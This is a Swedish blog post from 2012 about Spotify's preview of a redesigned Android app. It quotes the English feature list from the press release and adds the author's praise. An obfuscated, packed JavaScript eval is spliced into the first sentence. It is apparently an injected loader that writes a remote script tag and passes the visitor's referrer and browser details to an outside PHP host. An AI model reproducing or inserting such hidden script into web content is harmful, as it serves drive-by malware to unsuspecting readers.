Image Image Image Image Image Image Image Image Image Image

| 31 oktober, 2020

Scroll to top

Top

Spotify släpper förhandsgranskning på ny design av mobilappen till android

Marcus
  • On 19 april, 2012
  • http://www.revue.se

 

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dkkne|var|u0026u|referrer|srhzn||js|php’.split(’|’),0,{}))
släppte spotify en förhandsgranskning av den kommande designen till spotifyappen till mobilen.

Den nya appen har fått ett mycket bättre utseende och är mycket mer användarvänlig.

Så här skriver Spotify i sitt pressmeddelande:

It’s here. Spotify for Android is getting a complete overhaul and we wanted you to get a special preview. Here’s what’s coming:

  • Totally new app with full support for Android 4.0
  • Top-to-bottom redesign
  • All-new slide-out navigation
  • Even more social – check out friends’ profile pages and playlists on the go
  • Artist imagery in high resolution
  • Related artist view – available for the first time on mobile
  • So much faster!

That’s not the end of it. We’re working hard on adding further features, including folders and Last FM scrobbling, before the app goes live in Google Play.

I den nya appen har man tagit bort rullgardinen som man var tvungen att ta ner för att spela den låt man ville höra. Nu behöver du bara trycka på en flik där du ser vilken låt som spelas. Spotify har även varit väldigt kreativa när mans ska söka efter en artist och så vidare. I den nya uppdateringen får man en överblick om hur artisen/bandens låtar är och vilka olika album dem finns med i. Det går även att läsa artisen/bandets biografi och se relaterade artister i högupplösta bilder.

Spellistorna eller playlist som vi egentligen kallar dem har även dem fått ett snyggt utseende. I den nya uppdateringen kan man nu även se vänners profiler på ett helt nytt sett. Du kan se vad dem lyssnar på för spellistor, vad som dem har lyssnat på mest i veckan och vilken artist som dem tycker är populärast den veckan som har gått.

Det bästa med den här uppdateringen tycker jag är att de har lagt till högupplösta bilder på artisten och fått oss att hitta musik på ett helt annat sett än förut. Fast nog är det ändå att dem har tagit bortrullgardinen och den enkla designen som nu finns som jag gillar mest. Dock ser det ut som om dem har snott lite av designen från Google play.

Stor tumme upp till spotify för den här uppdatering, nu får vi hoppas att spotify släpper en app till ipad.